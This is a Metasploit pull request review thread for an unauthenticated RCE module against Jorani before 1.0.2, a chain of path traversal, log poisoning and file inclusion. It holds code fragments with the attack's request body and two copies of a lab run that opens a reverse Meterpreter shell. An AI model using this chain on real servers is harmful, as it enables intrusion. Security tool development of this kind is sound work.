Add exploit for unauth RCE Jorani
rapid7/metasploit-framework pull request #18123
Opened 2023-06-19 04:28 UTC by Guilhem7

This PR add a new exploit module for an unauthenticated RCE.

## Verification

You need to deploy an instance of a vulnerable jorani instance (version <= 1.0.0)

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/php/jorani_path_traversal`
- [ ] `set your options...`
- [ ] `check`
- [ ] `run`

Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.
If you wish to sanitize your pcap, please see the [wiki](https://docs.metasploit.com/docs/development/get-started/sanitizing-pcaps.html).

2023-06-19 19:26 UTC, jheysel-r7 reviewed
Thanks for the module @Guilhem7! I think this module might benefit using the Command Stagers mixin we have in metasploit. You can read more about the mixin here:
https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html

Command stagers allow modules that exploit command execution or code injection vulnerabilities to more easily exploit a variety of different payloads. If you have any questions let me know I'd be happy to help you out!

2023-06-20 12:51 UTC, jvoisin commented on modules/exploits/multi/php/jorani_path_trav.rb
> +                          ['URL', 'https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py']
Link is dead :/

2023-06-20 12:53 UTC, Guilhem7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +                          ['URL', 'https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py']
Yep for the moment it is, I'm waiting for it to be publish at this URL (soon)

2023-06-20 13:02 UTC, jvoisin requested changes

2023-06-20 13:02 UTC, jvoisin commented on modules/exploits/multi/php/jorani_path_trav.rb
> +      'data' => "csrf_test_jorani=#{csrf_tok}&last_page=session/login&language=#{path_trav_payload}&login=#{Rex::Text.uri_encode(poison_payload)}&CipheredValue=DummyPassword"
Can you put each key-value pair on their own line, to make this more readable?
Also, is `DummyPassword` a required string? If not, it should be randomized.

2023-06-20 13:02 UTC, jvoisin commented on modules/exploits/multi/php/jorani_path_trav.rb
> +        header_name => 'MSFExploit'
This value should be randomized.

2023-06-20 13:19 UTC, Guilhem7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +                          ['Jorani <= 1.0.0', {}]
Yep it is vuln in 1.0.0 and fixed in 1.0.2:

Author:
"This release fixes security issues and fixes some bugs.

It is recommended to change the file log extension to log instead of php in order to prevent **security exploits** based on **log injection**"

2023-06-20 13:19 UTC, Guilhem7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +        header_name => 'MSFExploit'
Okok, thanks for the review I'll change everything when I got some time !

2023-06-22 14:16 UTC, jheysel-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +                          %w[CVE CVE-2023-26469],
```suggestion
                          %w[CVE 2023-26469],
```

2023-06-22 14:16 UTC, jheysel-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +    return Exploit::CheckCode::Safe unless service_running(res)
Check to ensure `res` isn't `nil` before accessing

2023-06-22 14:16 UTC, jheysel-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +    print_good('Jorani seems to be running on the target !')
```suggestion
    print_good('Jorani seems to be running on the target!')
```

2023-06-22 14:16 UTC, jheysel-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +    return Exploit::CheckCode::Vulnerable if current_version <= Gem::Version.new('1.0.0')
```suggestion
    return Exploit::CheckCode::Appears if current_version <= Gem::Version.new('1.0.0')
```
When we're just checking a version we assert the `Appears` check code, when the check method exploits the vulnerability we assert the `Vulnerable` check code

2023-06-22 14:16 UTC, jheysel-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +    current_version = Gem::Version.new(current_version)
```suggestion
    current_version = Rex::Version.new(current_version)
```
The product standardizes on using `Rex::Version` for version comparisons

2023-06-22 14:16 UTC, jheysel-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +    header_name = (0...14).map { ('A'..'Z').to_a[rand(26)] }.join
`rand_text_alpha_upper` as `rand_text_alpha` can include both cases

2023-06-22 14:16 UTC, jheysel-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +    csrf_tok = recover_csrf(res)
ensure `res` is not `nil` before accessing

2023-06-26 18:07 UTC, gwillcox-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +                          ['URL', 'https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py']
Link is no longer dead and is active. Resolving this issue.

2023-06-26 18:09 UTC, gwillcox-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +                          ['Jorani <= 1.0.0', {}]
https://github.com/bbalet/jorani/releases/tag/v1.0.2 for the above point. We should however update this line to be `Jorani < 1.0.2` though now that we know what version is patched.

2023-06-27 14:16 UTC, gwillcox-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +                          %w[CVE CVE-2023-26469],
Suggested change was applied in https://github.com/rapid7/metasploit-framework/pull/18123/commits/8cae031d9765e7a400adff5fb12efb2c9b5fd441, confirming resolved.

2023-06-27 14:22 UTC, gwillcox-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +    print_good('Jorani seems to be running on the target !')
Confirmed resolved in https://github.com/rapid7/metasploit-framework/pull/18123/commits/8cae031d9765e7a400adff5fb12efb2c9b5fd441

2023-06-27 14:23 UTC, gwillcox-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +    return Exploit::CheckCode::Vulnerable if current_version <= Gem::Version.new('1.0.0')
Suggested change implemented with https://github.com/rapid7/metasploit-framework/pull/18123/commits/8cae031d9765e7a400adff5fb12efb2c9b5fd441, however I do wonder if this should be changed to `< Gem::Version.new('1.0.2')` instead now that we know which version was patched.

2023-06-27 14:24 UTC, gwillcox-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +    current_version = Gem::Version.new(current_version)
Confirmed changed in https://github.com/rapid7/metasploit-framework/pull/18123/commits/8cae031d9765e7a400adff5fb12efb2c9b5fd441

2023-06-27 14:26 UTC, gwillcox-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +    header_name = (0...14).map { ('A'..'Z').to_a[rand(26)] }.join
@jheysel-r7's suggested change of `rand_text_alpha_upper` has been implemented with https://github.com/rapid7/metasploit-framework/pull/18123/commits/8cae031d9765e7a400adff5fb12efb2c9b5fd441

2023-06-27 14:29 UTC, gwillcox-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +        header_name => 'MSFExploit'
This was changed to be `Rex::Text.rand_text_alpha(14)` however this will always generate a 14 byte long header and will only use alphabetical characters. Would we be able to do something like `Rex::Text.rand_text_alphanumberic(7..14)` which will allow us to do random alphanumberic character strings, ranging in length from 7 to 14 characters?

2023-06-27 16:01 UTC, gwillcox-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +                "CipheredValue=#{Rex::Text.rand_text_alpha(14)}"
Any reason this can't be `rand_text_alphanumberic`? Also consider making this into a range for further randomization such as `Rex::Text.rand_text_alphanumberic(7..14)`.

2023-06-27 16:01 UTC, gwillcox-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +      'data' => "csrf_test_jorani=#{csrf_tok}&last_page=session/login&language=#{path_trav_payload}&login=#{Rex::Text.uri_encode(poison_payload)}&CipheredValue=DummyPassword"
Fixed in https://github.com/rapid7/metasploit-framework/pull/18123/commits/8cae031d9765e7a400adff5fb12efb2c9b5fd441, have a further enhancement but I'll make a separate comment for that.

2023-06-27 16:03 UTC, gwillcox-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +    csrf_tok = recover_csrf(res)
I'm going to mark this as resolved for now since https://github.com/rapid7/metasploit-framework/pull/18123/commits/8cae031d9765e7a400adff5fb12efb2c9b5fd441 addressed this however with the updates we might need to adjust the current logic slightly to account for this returning `nil` on failure vs an empty string. Will mark as resolved in the mean time though.

2023-06-27 16:08 UTC, gwillcox-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +    return Exploit::CheckCode::Safe unless service_running(res)
Resolved in https://github.com/rapid7/metasploit-framework/pull/18123/commits/8cae031d9765e7a400adff5fb12efb2c9b5fd441

2023-06-27 16:33 UTC, gwillcox-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +    ''
Fixed in https://github.com/rapid7/metasploit-framework/pull/18123/commits/1b7e1343f888ed5266fa44552262af54cb9f956d

2023-06-27 16:33 UTC, gwillcox-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +    return Exploit::CheckCode::Vulnerable if current_version <= Gem::Version.new('1.0.0')
Fixed in https://github.com/rapid7/metasploit-framework/pull/18123/commits/1b7e1343f888ed5266fa44552262af54cb9f956d

2023-06-27 16:38 UTC, gwillcox-r7 commented
@Guilhem7 Fixed up what I could but will need your input on some points. Also awaiting documentation from you for this PR. Please refer to https://docs.metasploit.com/docs/development/get-started/creating-your-first-pr.html#writing-documentation if you need further information on how to do this.

2023-06-30 16:27 UTC, gwillcox-r7 requested changes

2023-06-30 16:27 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/php/jorani_path_trav.md
> +This is due to a lack of sanitization on language parameter, that can lead to file inclusion of ".php" files.
```suggestion
This is due to a lack of sanitization on the language parameter, which can lead to the inclusion of arbitrary ".php" files.
```

2023-06-30 16:27 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/php/jorani_path_trav.md
> +msf6 exploit(multi/php/jorani_path_trav) > run
Please also show which options you set or do a `show options` command output show that we can see which options you set prior to running the exploit. This helps us debug issues down the line and has solved confusions in the past so its useful to include.

2023-06-30 16:27 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/php/jorani_path_trav.md
> +8. Confirm you have now a cmd session
As which user?

2023-06-30 16:27 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/php/jorani_path_trav.md
> +Finally, the controller responsible for recovering a page doesn't properly redirect requests made by Ajax.
How is this relevant to the exploit? The impact here isn't really explained as to what this allows an attacker to do. For all I know this is just a bug with no real impact. Please explain why this is useful for an attacker and what impact it has on the exploitation process in terms of what it can be used for and how this contributes to a full exploit.

2023-06-30 16:27 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/php/jorani_path_trav.md
> +Log poisonning is possible, so an authenticated attacker can execute arbitrary code.
```suggestion
Log poisoning is possible, so an authenticated attacker can execute arbitrary code.
```

Can execute arbitrary code how though? Please elaborate on this, your assuming the reader knows a lot of prior information about how log poisoning works and how it can be used to get remote code execution.

2023-06-30 16:27 UTC, gwillcox-r7 commented on documentation/modules/exploit/multi/php/jorani_path_trav.md
> +Jorani prior to 1.0.2 allows unauthenticated remote malicious users to execute arbitrary code.
As which user?

2023-07-10 21:57 UTC, bwatters-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +      return Exploit::CheckCode::Safe
```suggestion
      return Exploit::CheckCode::Safe('There was a problem accessing the login page')
```
You may want to check out using the check code itself to give the specific information in a return rather than add a separate print statement.  Also, it's not something I think we really are hardcore about, but it is generally suggested that print statements in check methods be verbose, i.e. `vprint_status` or `vprint_error` if you choose to use a separate print statement.

2023-07-10 21:57 UTC, bwatters-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +      print_error("Jorani doesn't appears to be running on the target")
```suggestion
      print_error("Jorani doesn't appear to be running on the target")
```

2023-07-10 21:57 UTC, bwatters-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +    if matches[0].nil?
```suggestion
    if matches.nil?
```
This makes more sense to me, though it is the equivalent to `matches[0]`

2023-08-18 19:33 UTC, jheysel-r7 reviewed
Thanks for the module @Guilhem7. I've made some minor changes and tested the module successfully. Looks good 👍 
```
msf6 > use jorani
[*] Using configured payload php/meterpreter/reverse_tcp

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/php/jorani_path_trav  2023-01-06       excellent  Yes    Jorani unauthenticated Remote Code Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/php/jorani_path_trav

[*] Using exploit/multi/php/jorani_path_trav
msf6 exploit(multi/php/jorani_path_trav) > options

Module options (exploit/multi/php/jorani_path_trav):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path of Jorani
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Jorani < 1.0.2



View the full module info with the info, or info -d command.

msf6 exploit(multi/php/jorani_path_trav) > set rhosts 172.16.199.158
rhosts => 172.16.199.158
msf6 exploit(multi/php/jorani_path_trav) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/php/jorani_path_trav) > set rport 80
rport => 80
msf6 exploit(multi/php/jorani_path_trav) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
msf6 exploit(multi/php/jorani_path_trav) > set targeturi jorani
targeturi => jorani
msf6 exploit(multi/php/jorani_path_trav) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Jorani version
[+] Jorani seems to be running on the target!
[+] Found version: 1.0.0
[+] The target appears to be vulnerable.
[*] Trying to exploit LFI
[*] Recovering CSRF token
[+] CSRF found: be7e8205ad5f1fae2834478acdd0b546
[*] Poisoning log with payload..
[*] Sending 1st payload
[*] Including poisoned log file log-2023-08-18.php.
[+] Triggering payload
[*] Sending stage (39927 bytes) to 172.16.199.158
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.158:39624) at 2023-08-18 15:01:55 -0400

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 5.15.0-79-generic #86~20.04.2-Ubuntu SMP Mon Jul 17 23:27:17 UTC 2023 x86_64
Meterpreter : php/linux
meterpreter > exit
```

2023-08-18 19:33 UTC, jheysel-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +    print_status("Including poisoned log file #{log_file_name}.php")
Ran into this issue last night while testing, not much you can do to prevent this from happening
```suggestion
    print_status("Including poisoned log file #{log_file_name}.php")
    vprint_warning("The date on the attacker and victim machine must be the same for the exploit to be successful due to the timestamp on the poisoned logfile. Be careful running this exploit around midnight across timezones.")
```

2023-08-18 19:33 UTC, jheysel-r7 commented on documentation/modules/exploit/multi/php/jorani_path_trav.md
> +This module has been tested successfully on Jorani 1.0.0, Ubuntu 20.04 (x86_64) with kernel version 5.15.0-75.
```suggestion
This module has been tested successfully on Jorani 1.0.0, Ubuntu 20.04 (x86_64) with kernel version 5.15.0-75.

### Installation Steps
For a step by step installation tutorial on Ubuntu please refer to [How to install Jorani](https://jorani.org/how-to-install-jorani.html)
```

2023-08-18 19:33 UTC, jheysel-r7 commented on documentation/modules/exploit/multi/php/jorani_path_trav.md
> +Server username: www-data
Update the documentation as the module output has changed.
```suggestion
msf6 exploit(multi/php/jorani_path_trav) > options

Module options (exploit/multi/php/jorani_path_trav):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.16.199.158   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  jorani           yes       The base path of Jorani
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Jorani < 1.0.2



View the full module info with the info, or info -d command.

msf6 exploit(multi/php/jorani_path_trav) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Jorani version
[+] Jorani seems to be running on the target!
[+] Found version: 1.0.0
[+] The target appears to be vulnerable.
[*] Trying to exploit LFI
[*] Recovering CSRF token
[+] CSRF found: be7e8205ad5f1fae2834478acdd0b546
[*] Poisoning log with payload..
[*] Sending 1st payload
[*] Including poisoned log file log-2023-08-18.php.
[+] Triggering payload
[*] Sending stage (39927 bytes) to 172.16.199.158
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.158:39624) at 2023-08-18 15:01:55 -0400

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 5.15.0-79-generic #86~20.04.2-Ubuntu SMP Mon Jul 17 23:27:17 UTC 2023 x86_64
Meterpreter : php/linux
meterpreter > exit
```

2023-08-18 19:37 UTC, jheysel-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +    vprint_warning("The date on the attacker and victim machine must be the same for the exploit to be successful due to the timestamp on the poisoned logfile. Be careful running this exploit around
```suggestion
    vprint_warning('The date on the attacker and victim machine must be the same for the exploit to be successful due to the timestamp on the poisoned log file. Be careful running this exploit around midnight across timezones.')
```

2023-08-18 19:40 UTC, jheysel-r7 commented on modules/exploits/multi/php/jorani_path_trav.rb
> +  include Msf::Exploit::Remote::HttpClient
```suggestion
  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck
```

2023-08-18 20:54 UTC, merged

2023-08-18 20:55 UTC, jheysel-r7 commented
# Release Notes
This PR adds a module that chains together a log poisoning LFI,r redirection bypass and a path traversal vulnerability to obtain unauthenticated RCE.

2023-08-19 16:50 UTC, Guilhem7 commented
Hey thanks a lot for the merge ! :smile: